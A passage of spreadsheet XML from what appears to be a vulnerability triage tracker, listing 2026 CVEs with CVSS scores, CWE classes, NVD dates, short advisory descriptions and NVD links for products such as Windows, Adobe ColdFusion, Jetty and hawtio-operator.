      </c>
      <c r="I303" s="5" t="inlineStr"/>
      <c r="J303" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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3" s="5" t="inlineStr"/>
      <c r="M303" s="5" t="inlineStr"/>
      <c r="N303" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O303" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P303" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q303" s="5" t="inlineStr"/>
      <c r="R303" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S303" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T303" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69638</t>
        </is>
      </c>
    </row>
    <row r="304">
      <c r="A304" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B304" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C304" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75999</t>
        </is>
      </c>
      <c r="D304" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E304" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F304" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G304" s="5" t="inlineStr"/>
      <c r="H304" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I304" s="5" t="inlineStr"/>
      <c r="J304" s="5" t="inlineStr"/>
      <c r="K304" s="5" t="inlineStr"/>
      <c r="L304" s="5" t="inlineStr"/>
      <c r="M304" s="5" t="inlineStr"/>
      <c r="N304" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O304" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P304" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q304" s="5" t="inlineStr"/>
      <c r="R304" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S304" s="5" t="inlineStr">
        <is>
          <t>ColdFusion is affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. A low-privileged attacker could exploit this vulnerability to execute arbitrary code. The vulnerable component is restricted to an administrative network zone by default. Exploitation of this issue requires user interaction in that a victim must open a malicious file. Scope is changed.</t>
        </is>
      </c>
      <c r="T304" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75999</t>
        </is>
      </c>
    </row>
    <row r="305">
      <c r="A305" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B305" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C305" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77827</t>
        </is>
      </c>
      <c r="D305" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E305" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F305" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G305" s="5" t="inlineStr"/>
      <c r="H305" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I305" s="5" t="inlineStr"/>
      <c r="J305" s="5" t="inlineStr"/>
      <c r="K305" s="5" t="inlineStr"/>
      <c r="L305" s="5" t="inlineStr"/>
      <c r="M305" s="5" t="inlineStr"/>
      <c r="N305" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O305" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P305" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q305" s="5" t="inlineStr"/>
      <c r="R305" s="5" t="inlineStr">
        <is>
          <t>CWE-428</t>
        </is>
      </c>
      <c r="S305" s="5" t="inlineStr">
        <is>
          <t>Maono Link 3.8.13 MaonoAiServices Windows service allows local privilege escalation for a standard user account via improper write privileges in 'C:\ProgramData\Maono'. Fixed in 4.0.80.</t>
        </is>
      </c>
      <c r="T305" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77827</t>
        </is>
      </c>
    </row>
    <row r="306">
      <c r="A306" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B306" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C306" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86819</t>
        </is>
      </c>
      <c r="D306" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E306" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F306" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G306" s="5" t="inlineStr"/>
      <c r="H306" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I306" s="5" t="inlineStr"/>
      <c r="J306" s="5" t="inlineStr"/>
      <c r="K306" s="5" t="inlineStr"/>
      <c r="L306" s="5" t="inlineStr"/>
      <c r="M306" s="5" t="inlineStr"/>
      <c r="N306" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O306" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P306" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q306" s="5" t="inlineStr"/>
      <c r="R306" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S306" s="5" t="inlineStr">
        <is>
          <t>Waves Central for macOS contains a local privilege escalation in the privileged helper service. The helper authorizes connecting XPC clients by comparing the caller's code-signing certificate chain for equality with its own, rather than validating the caller against a pinned code requirement (application identifier and Team ID). A local, authenticated user can execute code within the vendor-signed process, satisfy the helper's client check, and cause the helper to execute a script with root privileges. Fixed in 17.0.</t>
        </is>
      </c>
      <c r="T306" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86819</t>
        </is>
      </c>
    </row>
    <row r="307">
      <c r="A307" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B307" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C307" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19203</t>
        </is>
      </c>
      <c r="D307" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E307" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F307" s="5" t="inlineStr">
        <is>
          <t>emo@eclipse.org</t>
        </is>
      </c>
      <c r="G307" s="5" t="inlineStr"/>
      <c r="H307" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I307" s="5" t="inlineStr"/>
      <c r="J307" s="5" t="inlineStr"/>
      <c r="K307" s="5" t="inlineStr"/>
      <c r="L307" s="5" t="inlineStr"/>
      <c r="M307" s="5" t="inlineStr"/>
      <c r="N307" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O307" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P307" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q307" s="5" t="inlineStr"/>
      <c r="R307" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="S307" s="5" t="inlineStr">
        <is>
          <t>A client may issue specially crafted HTTP/1.1 chunked requests to a Jetty server that cause Jetty and an intermediary proxy to interpret different request boundaries, potentially resulting in HTTP request smuggling.
This is caused by Jetty accepting a lone LF character as a terminator in parts of chunked request parsing. Depending on the Jetty version and configured HTTP compliance mode, this may occur in chunk extensions, chunk data termination, or trailer termination.</t>
        </is>
      </c>
      <c r="T307" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19203</t>
        </is>
      </c>
    </row>
    <row r="308">
      <c r="A308" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B308" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C308" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69646</t>
        </is>
      </c>
      <c r="D308" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E308" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F308" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G308" s="5" t="inlineStr"/>
      <c r="H308" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I308" s="5" t="inlineStr"/>
      <c r="J308" s="5" t="inlineStr"/>
      <c r="K308" s="5" t="inlineStr">
        <is>
          <t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t>
        </is>
      </c>
      <c r="L308" s="5" t="inlineStr"/>
      <c r="M308" s="5" t="inlineStr"/>
      <c r="N308" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O308" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P308" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q308" s="5" t="inlineStr"/>
      <c r="R308" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S308" s="5" t="inlineStr">
        <is>
          <t>Improper verification of cryptographic signature in Skype for Business allows an unauthorized attacker to perform spoofing over an adjacent network.</t>
        </is>
      </c>
      <c r="T308" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69646</t>
        </is>
      </c>
    </row>
    <row r="309">
      <c r="A309" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B309" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C309" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81821</t>
        </is>
      </c>
      <c r="D309" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E309" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F309" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G309" s="5" t="inlineStr"/>
      <c r="H309" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I309" s="5" t="inlineStr"/>
      <c r="J309" s="5" t="inlineStr"/>
      <c r="K309" s="5" t="inlineStr"/>
      <c r="L309" s="5" t="inlineStr"/>
      <c r="M309" s="5" t="inlineStr"/>
      <c r="N309" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O309" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P309" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q309" s="5" t="inlineStr"/>
      <c r="R309" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="S309" s="5" t="inlineStr">
        <is>
          <t>The vulnerability, if exploited, could allow a miscreant with read access to PIMBoards project files to decrypt and view sensitive information.</t>
        </is>
      </c>
      <c r="T309" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81821</t>
        </is>
      </c>
    </row>
    <row r="310">
      <c r="A310" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B310" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C310" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81822</t>
        </is>
      </c>
      <c r="D310" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E310" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F310" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G310" s="5" t="inlineStr"/>
      <c r="H310" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I310" s="5" t="inlineStr"/>
      <c r="J310" s="5" t="inlineStr"/>
      <c r="K310" s="5" t="inlineStr"/>
      <c r="L310" s="5" t="inlineStr"/>
      <c r="M310" s="5" t="inlineStr"/>
      <c r="N310" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O310" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P310" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q310" s="5" t="inlineStr"/>
      <c r="R310" s="5" t="inlineStr">
        <is>
          <t>CWE-327</t>
        </is>
      </c>
      <c r="S310" s="5" t="inlineStr">
        <is>
          <t>The vulnerability, if exploited, could allow a miscreant with read access to PIMBoards project files to reverse engineer PIMBoards users’ app-native passwords through computational brute-forcing of weak hashes, potentially allowing elevation to a PIMBoards administrator user.</t>
        </is>
      </c>
      <c r="T310" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81822</t>
        </is>
      </c>
    </row>
    <row r="311">
      <c r="A311" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B311" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C311" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69846</t>
        </is>
      </c>
      <c r="D311" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E311" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F311" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G311" s="5" t="inlineStr"/>
      <c r="H311" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I311" s="5" t="inlineStr"/>
      <c r="J311" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K31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11" s="5" t="inlineStr"/>
      <c r="M311" s="5" t="inlineStr"/>
      <c r="N311" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O311" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P311" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q311" s="5" t="inlineStr"/>
      <c r="R311" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S311" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T311" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69846</t>
        </is>
      </c>
    </row>
    <row r="312">
      <c r="A312" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B312" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C312" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69906</t>
        </is>
      </c>
      <c r="D312" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E312" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F312" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G312" s="5" t="inlineStr"/>
      <c r="H312" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I312" s="5" t="inlineStr"/>
      <c r="J312" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K31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12" s="5" t="inlineStr"/>
      <c r="M312" s="5" t="inlineStr"/>
      <c r="N312" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O312" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P312" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q312" s="5" t="inlineStr"/>
      <c r="R312" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S312" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T312" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69906</t>
        </is>
      </c>
    </row>
    <row r="313">
      <c r="A313" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B313" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C313" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72958</t>
        </is>
      </c>
      <c r="D313" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E313" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F313" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G313" s="5" t="inlineStr"/>
      <c r="H313" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I313" s="5" t="inlineStr"/>
      <c r="J313" s="5" t="inlineStr"/>
      <c r="K313" s="5" t="inlineStr"/>
      <c r="L313" s="5" t="inlineStr"/>
      <c r="M313" s="5" t="inlineStr"/>
      <c r="N313" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O313" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P313" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q313" s="5" t="inlineStr"/>
      <c r="R313" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="S313" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Credential Guard allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T313" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72958</t>
        </is>
      </c>
    </row>
    <row r="314">
      <c r="A314" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B314" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C314" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72961</t>
        </is>
      </c>
      <c r="D314" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E314" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F314" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G314" s="5" t="inlineStr"/>
      <c r="H314" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I314" s="5" t="inlineStr"/>
      <c r="J314" s="5" t="inlineStr"/>
      <c r="K314" s="5" t="inlineStr"/>
      <c r="L314" s="5" t="inlineStr"/>
      <c r="M314" s="5" t="inlineStr"/>
      <c r="N314" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O314" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P314" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q314" s="5" t="inlineStr"/>
      <c r="R314" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S314" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Hyper-V allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T314" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72961</t>
        </is>
      </c>
    </row>
    <row r="315">
      <c r="A315" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B315" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C315" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72962</t>
        </is>
      </c>
      <c r="D315" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E315" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F315" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G315" s="5" t="inlineStr"/>
      <c r="H315" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I315" s="5" t="inlineStr"/>
      <c r="J315" s="5" t="inlineStr"/>
      <c r="K315" s="5" t="inlineStr"/>
      <c r="L315" s="5" t="inlineStr"/>
      <c r="M315" s="5" t="inlineStr"/>
      <c r="N315" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O315" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P315" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q315" s="5" t="inlineStr"/>
      <c r="R315" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S315" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T315" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72962</t>
        </is>
      </c>
    </row>
    <row r="316">
      <c r="A316" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B316" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C316" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76191</t>
        </is>
      </c>
      <c r="D316" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E316" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F316" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G316" s="5" t="inlineStr"/>
      <c r="H316" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I316" s="5" t="inlineStr"/>
      <c r="J316" s="5" t="inlineStr"/>
      <c r="K316" s="5" t="inlineStr">
        <is>
          <t>adobe:animate, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L316" s="5" t="inlineStr"/>
      <c r="M316" s="5" t="inlineStr"/>
      <c r="N316" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O316" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P316" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q316" s="5" t="inlineStr"/>
      <c r="R316" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S316" s="5" t="inlineStr">
        <is>
          <t>Animate is affected by an Improper Control of Generation of Code ('Code Injection')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
        </is>
      </c>
      <c r="T316" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76191</t>
        </is>
      </c>
    </row>
    <row r="317">
      <c r="A317" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B317" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C317" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76202</t>
        </is>
      </c>
      <c r="D317" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E317" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F317" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G317" s="5" t="inlineStr"/>
      <c r="H317" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I317" s="5" t="inlineStr"/>
      <c r="J317" s="5" t="inlineStr"/>
      <c r="K317" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="L317" s="5" t="inlineStr"/>
      <c r="M317" s="5" t="inlineStr"/>
      <c r="N317" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O317" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P317" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q317" s="5" t="inlineStr"/>
      <c r="R317" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S317" s="5" t="inlineStr">
        <is>
          <t>Adobe Commerce is affected by an Incorrect Authorization vulnerability that could result in privilege escalation. An attacker could leverage this vulnerability to gain elevated access to sensitive information. Exploitation of this issue does not require user interaction.</t>
        </is>
      </c>
      <c r="T317" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76202</t>
        </is>
      </c>
    </row>
    <row r="318">
      <c r="A318" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B318" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C318" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77097</t>
        </is>
      </c>
      <c r="D318" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E318" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F318" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G318" s="5" t="inlineStr"/>
      <c r="H318" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I318" s="5" t="inlineStr"/>
      <c r="J318" s="5" t="inlineStr"/>
      <c r="K318" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault</t>
        </is>
      </c>
      <c r="L318" s="5" t="inlineStr"/>
      <c r="M318" s="5" t="inlineStr"/>
      <c r="N318" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O318" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P318" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q318" s="5" t="inlineStr"/>
      <c r="R318" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S318" s="5" t="inlineStr">
        <is>
          <t>Private Metrics Server contained a missing authentication condition affecting metrics upload functionality and service availability. Software customers upgrade to resolved maintenance release. Update Private Metrics Server.</t>
        </is>
      </c>
      <c r="T318" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77097</t>
        </is>
      </c>
    </row>
    <row r="319">
      <c r="A319" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B319" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C319" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77968</t>
        </is>
      </c>
      <c r="D319" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E319" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F319" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G319" s="5" t="inlineStr"/>
      <c r="H319" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I319" s="5" t="inlineStr"/>
      <c r="J319" s="5" t="inlineStr"/>
      <c r="K319" s="5" t="inlineStr"/>
      <c r="L319" s="5" t="inlineStr"/>
      <c r="M319" s="5" t="inlineStr"/>
      <c r="N319" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O319" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P319" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q319" s="5" t="inlineStr"/>
      <c r="R319" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S319" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in hawtio-operator. The operator's ClusterRole grants secrets: [create, get, list, update, watch] across all namespaces. While the operator uses a controller-runtime label-selector cache as a memory optimization, the ServiceAccount token authorizes read access to every Secret in the cluster. The operator also bypasses the cache via direct API calls. Compromise of the operator pod would yield read access to every Secret in the cluster, including bootstrap tokens, cloud credentials, and other operators' secrets.</t>
        </is>
      </c>
      <c r="T319" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77968</t>
        </is>
      </c>
    </row>
    <row r="320">
      <c r="A320" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B320" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C320" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81354</t>
        </is>
